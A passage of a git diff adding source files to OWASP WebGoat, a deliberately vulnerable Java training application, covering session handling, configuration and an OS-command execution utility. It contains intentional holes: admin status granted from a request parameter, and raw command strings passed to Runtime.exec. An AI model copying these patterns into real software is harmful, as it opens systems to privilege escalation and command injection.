+	public String getUserName()
+	{
+		// System.out.println("Request: " + getRequest() );
+		// System.out.println("Principal: " + getRequest().getUserPrincipal() );
+		// System.out.println("Name: " + getRequest().getUserPrincipal().getName( ) );
+		return getRequest().getUserPrincipal().getName();
+	}
+	
+	/**
+	 * Parse parameters from the given request, handle any servlet commands, and update this session
+	 * based on the parameters.
+	 * 
+	 * @param request Description of the Parameter
+	 * @param response Description of the Parameter
+	 * @param name Description of the Parameter
+	 */
+	public void update( HttpServletRequest request, HttpServletResponse response, String name )
+			throws IOException
+	{
+		String content = null;
+
+		clearMessage();
+		this.request = request;
+		this.response = response;
+		this.servletName = name;
+
+		if ( myParser == null )
+		{
+			myParser = new ParameterParser( request );
+		}
+		else
+		{
+			myParser.update( request );
+		}
+
+		// System.out.println("Current Screen 1: " + currentScreen );
+		// System.out.println("Previous Screen 1: " + previousScreen );
+		// FIXME: requires ?Logout=true
+		// FIXME: doesn't work right -- no reauthentication
+		if ( myParser.getRawParameter( LOGOUT, null ) != null )
+		{
+			System.out.println( "Logout " + request.getUserPrincipal() );
+			eatCookies();
+			request.getSession().invalidate();
+			currentScreen = WELCOME;
+			previousScreen = ERROR;
+		}
+
+		// There are several scenarios where we want the first lesson to be loaded
+		// 1) Previous screen is Welcome - Start of the course
+		// 2) After a logout and after the session has been reinitialized
+		if ( ( this.getPreviousScreen() == WebSession.WELCOME ) || ( getRequest().getSession( false ) != null &&
+		// getRequest().getSession(false).isNew() &&
+				this.getCurrentScreen() == WebSession.WELCOME && this.getPreviousScreen() == WebSession.ERROR ) )
+		{
+			currentScreen = course.getFirstLesson().getScreenId();
+			hintNum = -1;
+		}
+
+		// System.out.println("Current Screen 2: " + currentScreen );
+		// System.out.println("Previous Screen 2: " + previousScreen );
+		// update the screen variables
+		previousScreen = currentScreen;
+
+		try
+		{
+			// If the request is new there should be no parameters.
+			// This can occur from a session timeout or a the starting of a new course.
+			if ( !request.getSession().isNew() )
+			{
+				currentScreen = myParser.getIntParameter( SCREEN, currentScreen );
+			}
+			else
+			{
+				if ( !myParser.getRawParameter( SCREEN, "NULL" ).equals( "NULL" ) )
+				{
+					this.setMessage( "Session Timeout - Starting new Session." );
+				}
+			}
+		}
+		catch ( Exception e )
+		{
+		}
+
+		// clear variables when switching screens
+		if ( this.getCurrentScreen() != this.getPreviousScreen() )
+		{
+			if ( webgoatContext.isDebug() )
+			{
+				setMessage( "Changed to a new screen, clearing cookies and hints" );
+			}
+			eatCookies();
+			hintNum = -1;
+		}
+		else if (myParser.getRawParameter( STAGE, null ) != null) 
+		{
+			AbstractLesson al = getCurrentLesson();
+			if (al instanceof SequentialLessonAdapter)
+			{
+			SequentialLessonAdapter sla = (SequentialLessonAdapter) al;
+			int stage = myParser.getIntParameter(STAGE, sla.getStage(this));
+			if (stage > 0 && stage <= sla.getStageCount())
+				sla.setStage(this, stage);
+			}
+			else if (al instanceof RandomLessonAdapter)
+			{
+			try
+			{
+			RandomLessonAdapter rla = (RandomLessonAdapter) al;
+			int stage = myParser.getIntParameter(STAGE) - 1;
+			String[] stages = rla.getStages();
+			if (stage>=0 && stage < stages.length)
+				rla.setStage(this, stages[stage]);
+			} catch (ParameterNotFoundException pnfe) {}
+			}
+		}
+		// else update global variables for the current screen
+		else
+		{
+			// Handle "restart" commands
+			int lessonId = myParser.getIntParameter( RESTART, -1 );
+			if ( lessonId != -1 )
+			{
+				restartLesson(lessonId);
+			}
+			//if ( myParser.getBooleanParameter( RESTART, false ) )
+			//{
+			//	getCurrentLesson().getLessonTracker( this ).getLessonProperties().setProperty( CHALLENGE_STAGE, "1" );
+			//}
+			
+			// Handle "show" commands
+			String showCommand = myParser.getStringParameter( SHOW, null );
+			if ( showCommand != null )
+			{
+				if ( showCommand.equalsIgnoreCase( SHOW_PARAMS ) )
+				{
+					showParams = !showParams;
+				}
+				else if ( showCommand.equalsIgnoreCase( SHOW_COOKIES ) )
+				{
+					showCookies = !showCookies;
+				}
+				else if ( showCommand.equalsIgnoreCase( SHOW_SOURCE ) )
+				{
+					content = getSource();
+					//showSource = true;
+				}
+				else if ( showCommand.equalsIgnoreCase( SHOW_SOLUTION ) )
+				{
+					content = getSolution();
+					//showSource = true;
+				}
+				else if ( showCommand.equalsIgnoreCase( SHOW_NEXTHINT ) )
+				{
+					getNextHint();
+				}
+				else if ( showCommand.equalsIgnoreCase( SHOW_PREVIOUSHINT ) )
+				{
+					getPreviousHint();
+				}
+			}
+
+		}
+
+		isAdmin = request.isUserInRole( WEBGOAT_ADMIN );
+		isHackedAdmin = myParser.getBooleanParameter( ADMIN, isAdmin );
+		if ( isHackedAdmin )
+		{
+			System.out.println("Hacked admin");
+			hasHackedHackableAdmin = true;
+		}
+		isColor = myParser.getBooleanParameter( COLOR, isColor );
+		isDebug = myParser.getBooleanParameter( DEBUG, isDebug );
+
+		// System.out.println( "showParams:" + showParams );
+		// System.out.println( "showSource:" + showSource );
+		// System.out.println( "showSolution:" + showSolution );
+		// System.out.println( "showCookies:" + showCookies );
+		// System.out.println( "showRequest:" + showRequest );
+		
+		if (content != null)
+		{
+			response.setContentType("text/html");
+			PrintWriter out = new PrintWriter(response.getOutputStream());
+			out.print(content);	
+			out.flush();
+			out.close();
+		}
+	}
+	
+	private void restartLesson(int lessonId)
+	{
+		AbstractLesson al = getLesson(lessonId);
+		System.out.println("Restarting lesson: " + al);
+		al.getLessonTracker( this ).setCompleted(false);
+		if (al instanceof SequentialLessonAdapter)
+		{
+		SequentialLessonAdapter sla = (SequentialLessonAdapter) al;
+		sla.getLessonTracker( this ).setStage(1);
+		}
+	}
+
+	/**
+	 * @param string
+	 */
+	public void setHasHackableAdmin( String role )
+	{
+		hasHackedHackableAdmin = ( AbstractLesson.HACKED_ADMIN_ROLE.equals( role ) & hasHackedHackableAdmin );
+
+		// if the user got the Admin=true parameter correct AND they accessed an admin screen
+		if ( hasHackedHackableAdmin )
+		{
+			completedHackableAdmin = true;
+		}
+	}
+	
+	/**
+	 * @return Returns the isDebug.
+	 */
+	public boolean isDebug()
+	{
+		return isDebug;
+	}
+
+	/**
+	 * @param header - request header value to return
+	 * @return
+	 */
+	public String getHeader( String header )
+	{
+		return getRequest().getHeader( header );
+	}
+
+	public String getNextHint()
+	{
+		String hint = null;
+
+		// FIXME
+		int maxHints = getCurrentLesson().getHintCount(this);
+		if ( hintNum < maxHints - 1 )
+		{
+			hintNum++;
+
+			// Hints are indexed from 0
+			getCurrentLesson().getLessonTracker( this ).setMaxHintLevel( getHintNum() + 1 );
+
+			hint = (String) getCurrentLesson().getHint( this, getHintNum() );
+		}
+
+		return hint;
+	}
+
+	public String getPreviousHint()
+	{
+		String hint = null;
+
+		if ( hintNum > 0 )
+		{
+			hintNum--;
+
+			// Hints are indexed from 0
+			getCurrentLesson().getLessonTracker( this ).setMaxHintLevel( getHintNum() + 1 );
+
+			hint = (String) getCurrentLesson().getHint( this, getHintNum() );
+		}
+
+		return hint;
+	}
+
+	public void setCurrentMenu(Integer ranking) 
+	{
+		currentMenu = ranking.intValue();
+	}
+	
+	public int getCurrentMenu()
+	{
+		return currentMenu;	
+	}
+	
+	public WebgoatContext getWebgoatContext() {
+		return webgoatContext;
+	}
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/WebgoatContext.java b/main/project/JavaSource/org/owasp/webgoat/session/WebgoatContext.java
new file mode 100755
index 000000000..f2a79223a
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/WebgoatContext.java
@@ -0,0 +1,198 @@
+package org.owasp.webgoat.session;
+
+import java.util.Iterator;
+
+import javax.servlet.http.HttpServlet;
+
+public class WebgoatContext {
+
+	public final static String DATABASE_CONNECTION_STRING = "DatabaseConnectionString";
+
+	public final static String DATABASE_DRIVER = "DatabaseDriver";
+
+	public final static String DATABASE_USER = "DatabaseUser";
+
+	public final static String DATABASE_PASSWORD = "DatabasePassword";
+
+	public final static String ENTERPRISE = "Enterprise";
+
+	public final static String CODING_EXERCISES = "CodingExercises";
+	
+	public final static String SHOWCOOKIES = "ShowCookies";
+
+	public final static String SHOWPARAMS = "ShowParams";
+
+	public final static String SHOWREQUEST = "ShowRequest";
+
+	public final static String SHOWSOURCE = "ShowSource";
+	
+	public final static String SHOWSOLUTION = "ShowSolution";
+	
+	public final static String SHOWHINTS = "ShowHints";
+
+	public final static String DEFUSEOSCOMMANDS = "DefuseOSCommands";
+
+	public final static String FEEDBACK_ADDRESS = "FeedbackAddress";
+
+	public final static String DEBUG = "debug";
+
+	private String databaseConnectionString;
+
+	private String realConnectionString = null;
+
+	private String databaseDriver;
+
+	private String databaseUser;
+
+	private String databasePassword;
+
+	private boolean showCookies = false;
+
+	private boolean showParams = false;
+
+	private boolean showRequest = false;
+
+	private boolean showSource = false;
+
+	private boolean showSolution = false;
+
+	private boolean defuseOSCommands = false;
+
+	private boolean enterprise = false;
+
+	private boolean codingExercises = false;
+	
+	private String feedbackAddress = "<A HREF=mailto:webgoat@owasp.org>webgoat@owasp.org</A>";
+
+	private boolean isDebug = false;
+
+	private String servletName;
+
+	private HttpServlet servlet;
+
+	public WebgoatContext(HttpServlet servlet) {
+		this.servlet = servlet;
+		databaseConnectionString = getParameter(servlet, DATABASE_CONNECTION_STRING);
+		databaseDriver = getParameter(servlet, DATABASE_DRIVER);
+		databaseUser = getParameter(servlet, DATABASE_USER);
+		databasePassword = getParameter(servlet, DATABASE_PASSWORD);
+		
+		// initialize from web.xml
+		showParams = "true".equals( getParameter(servlet, SHOWPARAMS ) );
+		showCookies = "true".equals( getParameter(servlet, SHOWCOOKIES ) );
+		showSource = "true".equals( getParameter(servlet, SHOWSOURCE ) );
+		showSolution = "true".equals( getParameter( servlet, SHOWSOLUTION ) );
+		defuseOSCommands = "true".equals( getParameter(servlet, DEFUSEOSCOMMANDS ) );
+		enterprise = "true".equals( getParameter(servlet, ENTERPRISE ) );
+		codingExercises = "true".equals( getParameter(servlet, CODING_EXERCISES ) );
+		feedbackAddress = getParameter(servlet, FEEDBACK_ADDRESS ) != null ? 
+				getParameter(servlet, FEEDBACK_ADDRESS ) : feedbackAddress;
+		showRequest = "true".equals( getParameter(servlet, SHOWREQUEST ) );
+		isDebug = "true".equals( getParameter(servlet, DEBUG ) );
+		servletName = servlet.getServletName();
+		
+	}
+
+	private String getParameter(HttpServlet servlet, String key) {
+		String value = System.getenv().get(key);
+		if (value == null)
+			value = servlet.getInitParameter(key);
+		return value;
+	}
+	
+	/**
+	 * returns the connection string with the real path to the database
+	 * directory inserted at the word PATH
+	 * 
+	 * @return The databaseConnectionString value
+	 */
+	public String getDatabaseConnectionString() {
+		if (realConnectionString == null)
+			try {
+				String path = servlet.getServletContext().getRealPath(
+						"/database").replace('\\', '/');
+				System.out.println("PATH: " + path);
+				realConnectionString = databaseConnectionString.replaceAll(
+						"PATH", path);
+				System.out.println("Database Connection String: "
+						+ realConnectionString);
+			} catch (Exception e) {
+				System.out
+						.println("Couldn't open database: check web.xml database parameters");
+				e.printStackTrace();
+			}
+		return realConnectionString;
+	}
+
+	/**
+	 * Gets the databaseDriver attribute of the WebSession object
+	 * 
+	 * @return The databaseDriver value
+	 */
+	public String getDatabaseDriver() {
+		return (databaseDriver);
+	}
+
+	/**
+	 * Gets the databaseUser attribute of the WebSession object
+	 * 
+	 * @return The databaseUser value
+	 */
+	public String getDatabaseUser() {
+		return (databaseUser);
+	}
+
+	/**
+	 * Gets the databasePassword attribute of the WebSession object
+	 * 
+	 * @return The databasePassword value
+	 */
+	public String getDatabasePassword() {
+		return (databasePassword);
+	}
+
+	public boolean isDefuseOSCommands() {
+		return defuseOSCommands;
+	}
+
+	public boolean isEnterprise() {
+		return enterprise;
+	}
+
+	public boolean isCodingExercises() {
+		return codingExercises;
+	}
+	
+	public String getFeedbackAddress() {
+		return feedbackAddress;
+	}
+
+	public boolean isDebug() {
+		return isDebug;
+	}
+
+	public String getServletName() {
+		return servletName;
+	}
+
+	public boolean isShowCookies() {
+		return showCookies;
+	}
+
+	public boolean isShowParams() {
+		return showParams;
+	}
+
+	public boolean isShowRequest() {
+		return showRequest;
+	}
+
+	public boolean isShowSource() {
+		return showSource;
+	}
+
+	public boolean isShowSolution() {
+		return showSolution;
+	}
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/WebgoatProperties.java b/main/project/JavaSource/org/owasp/webgoat/session/WebgoatProperties.java
new file mode 100644
index 000000000..e9501ad61
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/WebgoatProperties.java
@@ -0,0 +1,133 @@
+package org.owasp.webgoat.session;
+
+import java.io.FileInputStream;
+import java.io.IOException;
+import java.util.Properties;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class WebgoatProperties extends Properties
+{
+
+    /**
+	 * 
+	 */
+	private static final long serialVersionUID = 4351681705558227918L;
+
+
+	public WebgoatProperties(String propertiesFileName) throws IOException
+    {
+	try
+	{
+	    FileInputStream in = new FileInputStream(propertiesFileName);
+	    load(in);
+	}
+	catch (IOException e)
+	{
+	    System.out
+		    .println("Warning: Unable to open webgoat.properties file");
+	}
+    }
+
+
+    public int getIntProperty(String key, int defaultValue)
+    {
+	int value = defaultValue;
+
+	String s = getProperty(key);
+	if (s != null)
+	{
+	    value = Integer.parseInt(s);
+	}
+
+	return value;
+    }
+
+
+    public boolean getBooleanProperty(String key, boolean defaultValue)
+    {
+	boolean value = defaultValue;
+	key = this.trimLesson(key);
+
+	String s = getProperty(key);
+	if (s != null)
+	{
+	    if (s.equalsIgnoreCase("true"))
+		value = true;
+	    else if (s.equalsIgnoreCase("yes"))
+		value = true;
+	    else if (s.equalsIgnoreCase("on"))
+		value = true;
+	    else if (s.equalsIgnoreCase("false"))
+		value = false;
+	    else if (s.equalsIgnoreCase("no"))
+		value = false;
+	    else if (s.equalsIgnoreCase("off"))
+		value = false;
+	}
+
+	return value;
+    }
+
+
+    private String trimLesson(String lesson)
+    {
+	String result = "";
+
+	if (lesson.startsWith("org.owasp.webgoat.lessons."))
+	{
+	    result = lesson.substring("org.owasp.webgoat.lessons.".length(),
+		    lesson.length());
+	}
+	else
+	{
+	    result = lesson;
+	}
+
+	return result;
+    }
+
+
+    public static void main(String[] args)
+    {
+	WebgoatProperties properties = null;
+	try
+	{
+	    properties = new WebgoatProperties("C:\\webgoat.properties");
+	}
+	catch (IOException e)
+	{
+	    System.out.println("Error loading properties");
+	    e.printStackTrace();
+	}
+	System.out.println(properties.getProperty("CommandInjection.category"));
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/util/Exec.java b/main/project/JavaSource/org/owasp/webgoat/util/Exec.java
new file mode 100644
index 000000000..ea061dc35
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/util/Exec.java
@@ -0,0 +1,542 @@
+package org.owasp.webgoat.util;
+
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.util.BitSet;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created    October 28, 2003
+ */
+public class Exec
+{
+
+    /**
+     *  Description of the Method
+     *
+     * @param  command  Description of the Parameter
+     * @param  input    Description of the Parameter
+     * @return          Description of the Return Value
+     */
+    public static ExecResults execInput(String command, String input)
+    {
+	return (execOptions(command, input, 0, 0, false));
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  command  Description of the Parameter
+     * @return          Description of the Return Value
+     */
+    public static ExecResults execLazy(String command)
+    {
+	return (execOptions(command, "", 0, 0, true));
+    }
+
+
+    /*
+     *  Execute an OS command and capture the output in an ExecResults.
+     *  All exceptions are caught and stored in the ExecResults.
+     *  @param String command is the OS command to execute
+     *  @param String input is piped into the OS command
+     *  @param int successCode is the expected return code if the command completes successfully
+     *  @param int timeout is the number of milliseconds to wait before interrupting the command
+     *  @param boolean quit tells the method to exit when there is no more output waiting
+     */
+    /**
+     *  Description of the Method
+     *
+     * @param  command      Description of the Parameter
+     * @param  input        Description of the Parameter
+     * @param  successCode  Description of the Parameter
+     * @param  timeout      Description of the Parameter
+     * @param  lazy         Description of the Parameter
+     * @return              Description of the Return Value
+     */
+    public static ExecResults execOptions(String[] command, String input,
+	    int successCode, int timeout, boolean lazy)
+    {
+	Process child = null;
+	ByteArrayOutputStream output = new ByteArrayOutputStream();
+	ByteArrayOutputStream errors = new ByteArrayOutputStream();
+	ExecResults results = new ExecResults(command[0], input, successCode,
+		timeout);
+	BitSet interrupted = new BitSet(1);
+	boolean lazyQuit = false;
+	ThreadWatcher watcher;
+
+	try
+	{
+	    // start the command
+	    child = Runtime.getRuntime().exec(command);
+
+	    // get the streams in and out of the command
+	    InputStream processIn = child.getInputStream();
+	    InputStream processError = child.getErrorStream();
+	    OutputStream processOut = child.getOutputStream();
+
+	    // start the clock running
+	    if (timeout > 0)
+	    {
+		watcher = new ThreadWatcher(child, interrupted, timeout);
+		new Thread(watcher).start();
+	    }
+
+	    // Write to the child process' input stream
+	    if ((input != null) && !input.equals(""))
+	    {
+		try
+		{
+		    processOut.write(input.getBytes());
+		    processOut.flush();
+		    processOut.close();
+		}
+		catch (IOException e1)
+		{
+		    results.setThrowable(e1);
+		}
+	    }
+
+	    // Read from the child process' output stream
+	    // The process may get killed by the watcher at any time
+	    int c = 0;
+
+	    try
+	    {
+		while (true)
+		{
+		    if (interrupted.get(0) || lazyQuit)
+		    {
+			break;
+		    }
+
+		    // interrupted
+		    c = processIn.read();
+
+		    if (c == -1)
+		    {
+			break;
+		    }
+
+		    // end of stream
+		    output.write(c);
+
+		    if (lazy && (processIn.available() < 1))
+		    {
+			lazyQuit = true;
+		    }
+
+		    // if lazy and nothing then quit (after at least one read)
+		}
+
+		processIn.close();
+	    }
+	    catch (IOException e2)
+	    {
+		results.setThrowable(e2);
+	    }
+	    finally
+	    {
+		if (interrupted.get(0))
+		{
+		    results.setInterrupted();
+		}
+
+		results.setOutput(output.toString());
+	    }
+
+	    // Read from the child process' error stream
+	    // The process may get killed by the watcher at any time
+	    try
+	    {
+		while (true)
+		{
+		    if (interrupted.get(0) || lazyQuit)
+		    {
+			break;
+		    }
+
+		    // interrupted
+		    c = processError.read();
+
+		    if (c == -1)
+		    {
+			break;
+		    }
+
+		    // end of stream
+		    output.write(c);
+
+		    if (lazy && (processError.available() < 1))
+		    {
+			lazyQuit = true;
+		    }
+
+		    // if lazy and nothing then quit (after at least one read)
+		}
+
+		processError.close();
+	    }
+	    catch (IOException e3)
+	    {
+		results.setThrowable(e3);
+	    }
+	    finally
+	    {
+		if (interrupted.get(0))
+		{
+		    results.setInterrupted();
+		}
+
+		results.setErrors(errors.toString());
+	    }
+
+	    // wait for the return value of the child process.
+	    if (!interrupted.get(0) && !lazyQuit)
+	    {
+		int returnCode = child.waitFor();
+		results.setReturnCode(returnCode);
+
+		if (returnCode != successCode)
+		{
+		    results.setError(ExecResults.BADRETURNCODE);
+		}
+	    }
+	}
+	catch (InterruptedException i)
+	{
+	    results.setInterrupted();
+	}
+	catch (Throwable t)
+	{
+	    results.setThrowable(t);
+	}
+	finally
+	{
+	    if (child != null)
+	    {
+		child.destroy();
+	    }
+	}
+
+	return (results);
+    }
+
+
+    /*
+     *  Execute an OS command and capture the output in an ExecResults.
+     *  All exceptions are caught and stored in the ExecResults.
+     *  @param String command is the OS command to execute
+     *  @param String input is piped into the OS command
+     *  @param int successCode is the expected return code if the command completes successfully
+     *  @param int timeout is the number of milliseconds to wait before interrupting the command
+     *  @param boolean quit tells the method to exit when there is no more output waiting
+     */
+    /**
+     *  Description of the Method
+     *
+     * @param  command      Description of the Parameter
+     * @param  input        Description of the Parameter
+     * @param  successCode  Description of the Parameter
+     * @param  timeout      Description of the Parameter
+     * @param  lazy         Description of the Parameter
+     * @return              Description of the Return Value
+     */
+    public static ExecResults execOptions(String command, String input,
+	    int successCode, int timeout, boolean lazy)
+    {
+	Process child = null;
+	ByteArrayOutputStream output = new ByteArrayOutputStream();
+	ByteArrayOutputStream errors = new ByteArrayOutputStream();
+	ExecResults results = new ExecResults(command, input, successCode,
+		timeout);
+	BitSet interrupted = new BitSet(1);
+	boolean lazyQuit = false;
+	ThreadWatcher watcher;
+
+	try
+	{
+	    // start the command
+	    child = Runtime.getRuntime().exec(command);
+
+	    // get the streams in and out of the command
+	    InputStream processIn = child.getInputStream();
+	    InputStream processError = child.getErrorStream();
+	    OutputStream processOut = child.getOutputStream();
+
+	    // start the clock running
+	    if (timeout > 0)
+	    {
+		watcher = new ThreadWatcher(child, interrupted, timeout);
+		new Thread(watcher).start();
+	    }
+
+	    // Write to the child process' input stream
+	    if ((input != null) && !input.equals(""))
+	    {
+		try
+		{
+		    processOut.write(input.getBytes());
+		    processOut.flush();
+		    processOut.close();
+		}
+		catch (IOException e1)
+		{
+		    results.setThrowable(e1);
+		}
+	    }
+
+	    // Read from the child process' output stream
+	    // The process may get killed by the watcher at any time
+	    int c = 0;
+
+	    try
+	    {
+		while (true)
+		{
+		    if (interrupted.get(0) || lazyQuit)
+		    {
+			break;
+		    }
+
+		    // interrupted
+		    c = processIn.read();
+
+		    if (c == -1)
+		    {
+			break;
+		    }
+
+		    // end of stream
+		    output.write(c);
+
+		    if (lazy && (processIn.available() < 1))
+		    {
+			lazyQuit = true;
+		    }
+
+		    // if lazy and nothing then quit (after at least one read)
+		}
+
+		processIn.close();
+	    }
+	    catch (IOException e2)
+	    {
+		results.setThrowable(e2);
+	    }
+	    finally
+	    {
+		if (interrupted.get(0))
+		{
+		    results.setInterrupted();
+		}
+
+		results.setOutput(output.toString());
+	    }
+
+	    // Read from the child process' error stream
+	    // The process may get killed by the watcher at any time
+	    try
+	    {
+		while (true)
+		{
+		    if (interrupted.get(0) || lazyQuit)
+		    {
+			break;
+		    }
+
+		    // interrupted
+		    c = processError.read();
+
+		    if (c == -1)
+		    {
+			break;
+		    }
+
+		    // end of stream
+		    output.write(c);
+
+		    if (lazy && (processError.available() < 1))
+		    {
+			lazyQuit = true;
+		    }
+
+		    // if lazy and nothing then quit (after at least one read)
+		}
+
+		processError.close();
+	    }
+	    catch (IOException e3)
+	    {
+		results.setThrowable(e3);
+	    }
+	    finally
+	    {
+		if (interrupted.get(0))
+		{
+		    results.setInterrupted();
+		}
+
+		results.setErrors(errors.toString());
+	    }
+
+	    // wait for the return value of the child process.
+	    if (!interrupted.get(0) && !lazyQuit)
+	    {
+		int returnCode = child.waitFor();
+		results.setReturnCode(returnCode);
+
+		if (returnCode != successCode)
+		{
+		    results.setError(ExecResults.BADRETURNCODE);
+		}
+	    }
+	}
+	catch (InterruptedException i)
+	{
+	    results.setInterrupted();
+	}
+	catch (Throwable t)
+	{
+	    results.setThrowable(t);
+	}
+	finally
+	{
+	    if (child != null)
+	    {
+		child.destroy();
+	    }
+	}
+
+	return (results);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  command  Description of the Parameter
+     * @return          Description of the Return Value
+     */
+    public static ExecResults execSimple(String[] command)
+    {
+	return (execOptions(command, "", 0, 0, false));
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  command  Description of the Parameter
+     * @return          Description of the Return Value
+     */
+    public static ExecResults execSimple(String command)
+    {
+	return (execOptions(command, "", 0, 0, false));
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  command  Description of the Parameter
+     * @param  args     Description of the Parameter
+     * @return          Description of the Return Value
+     */
+    public static ExecResults execSimple(String command, String args)
+    {
+	return (execOptions(command, args, 0, 0, false));
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  command  Description of the Parameter
+     * @param  timeout  Description of the Parameter
+     * @return          Description of the Return Value
+     */
+    public static ExecResults execTimeout(String command, int timeout)
+    {
+	return (execOptions(command, "", 0, timeout, false));
+    }
+
+
+    /**
+     *  The main program for the Exec class
+     *
+     * @param  args  The command line arguments
+     */
+    public static void main(String[] args)
+    {
+	ExecResults results;
+	String sep = System.getProperty("line.separator");
+	System.out.println("-------------------------------------------" + sep
+		+ "TEST 1: execSimple");
+	results = Exec.execSimple("c:/swarm-2.1.1/bin/whoami.exe");
+	System.out.println(results);
+	System.out.println("-------------------------------------------" + sep
+		+ "TEST 2: execSimple (with search)");
+	results = Exec.execSimple("netstat -r");
+	System.out.println(results);
+
+	if (results.outputContains("localhost:1031"))
+	{
+	    System.out.println("ERROR: listening on 1031");
+	}
+
+	System.out.println("-------------------------------------------" + sep
+		+ "TEST 3: execInput");
+	results = Exec.execInput("find \"cde\"",
+		"abcdefg1\nhijklmnop\nqrstuv\nabcdefg2");
+	System.out.println(results);
+	System.out.println("-------------------------------------------" + sep
+		+ "TEST 4:execTimeout");
+	results = Exec.execTimeout("ping -t 127.0.0.1", 5 * 1000);
+	System.out.println(results);
+	System.out.println("-------------------------------------------" + sep
+		+ "TEST 5:execLazy");
+	results = Exec.execLazy("ping -t 127.0.0.1");
+	System.out.println(results);
+	System.out.println("-------------------------------------------" + sep
+		+ "TEST 6:ExecTimeout process never outputs");
+	results = Exec.execTimeout("c:/swarm-2.1.1/bin/sleep.exe 20", 5 * 1000);
+	System.out.println(results);
+	System.out.println("-------------------------------------------" + sep
+		+ "TEST 7:ExecTimeout process waits for input");
+	results = Exec.execTimeout("c:/swarm-2.1.1/bin/cat", 5 * 1000);
+	System.out.println(results);
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/util/ExecResults.java b/main/project/JavaSource/org/owasp/webgoat/util/ExecResults.java
new file mode 100644
index 000000000..b3dd1c5de
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/util/ExecResults.java
@@ -0,0 +1,360 @@
+package org.owasp.webgoat.util;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ */
+public class ExecResults
+{
+
+    /**
+     *  Description of the Field
+     */
+    public final static int BADRETURNCODE = 2;
+
+    /**
+     *  Description of the Field
+     */
+    public final static int THROWABLE = 1;
+
+    private String myCommand;
+
+    private boolean myError = false;
+
+    private int myErrorType = 0;
+
+    private String myErrors = null;
+
+    private String myInput;
+
+    private boolean myInterrupted = false;
+
+    private String myOutput = null;
+
+    private int myReturnCode = 0;
+
+    private int mySuccessCode;
+
+    private Throwable myThrowable = null;
+
+    private int myTimeout;
+
+
+    /**
+     *  Constructor for the ExecResults object
+     *
+     *@param  command      Description of the Parameter
+     *@param  input        Description of the Parameter
+     *@param  successCode  Description of the Parameter
+     *@param  timeout      Description of the Parameter
+     */
+    public ExecResults(String command, String input, int successCode,
+	    int timeout)
+    {
+	myCommand = command.trim();
+	myInput = input.trim();
+	mySuccessCode = successCode;
+	myTimeout = timeout;
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     *@param  haystack   Description of the Parameter
+     *@param  needle     Description of the Parameter
+     *@param  fromIndex  Description of the Parameter
+     *@return            Description of the Return Value
+     */
+    private boolean contains(String haystack, String needle, int fromIndex)
+    {
+	return (haystack.trim().toLowerCase().indexOf(
